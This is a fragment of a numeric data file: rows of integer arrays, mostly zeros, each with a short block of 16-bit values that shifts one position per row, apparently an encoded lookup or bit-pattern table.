[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 31620, 33345, 1510, 41734, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 52480, 15168, 17616, 8116, 13261, 39790],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 57988, 39233, 29414, 8198, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 7680, 63360, 8672, 18296, 59166, 49673],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 18820, 45121, 57318, 40198, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 768, 63680, 43056, 33676, 29443, 59776],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 45188, 51009, 19686, 6662, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 58112, 57536, 7728, 36876, 37379],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 6020, 56897, 47590, 38662, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 2304, 10816, 51344, 16036, 42505, 43906],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 32388, 62785, 9958, 5126, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 10240, 2560, 21120, 24736, 27944, 52490, 49325],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 58756, 3137, 37862, 37126, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 24320, 12224, 65008, 26364, 8799, 15860],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 19588, 9025, 230, 3590, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 9728, 55680, 33376, 408, 1159],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 45956, 14913, 28134, 35590, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 34048, 26944, 57424, 58004, 61829, 14678],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 6788, 20801, 56038, 2054, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 13824, 15744, 50016, 48088, 21814, 17],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 33156, 26689, 18406, 34054, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 64256, 14016, 18352, 59244, 12539, 37416],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 59524, 32577, 46310, 518, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 30976, 54848, 1936, 37732, 57803],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 20356, 38465, 8678, 32518, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 31620, 29249, 47338],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 46724, 44353, 36582, 64518, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 41472, 47232, 2592, 25480, 2978, 1077],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 7556, 50241, 64486, 30982, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 55040, 3520, 17776, 62684, 6871, 47644],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 33924, 56129, 26854, 62982, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 38656, 24000, 29040, 36303],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 60292, 62017, 54758, 29446, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 15616, 55104, 52176, 31092, 50237, 24126],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 21124, 2369, 17126, 61446, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 19968, 50048, 62688, 37944, 48206, 4377],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 47492, 8257, 45030, 27910, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 62208, 46272, 46896, 32588, 39923, 18896],
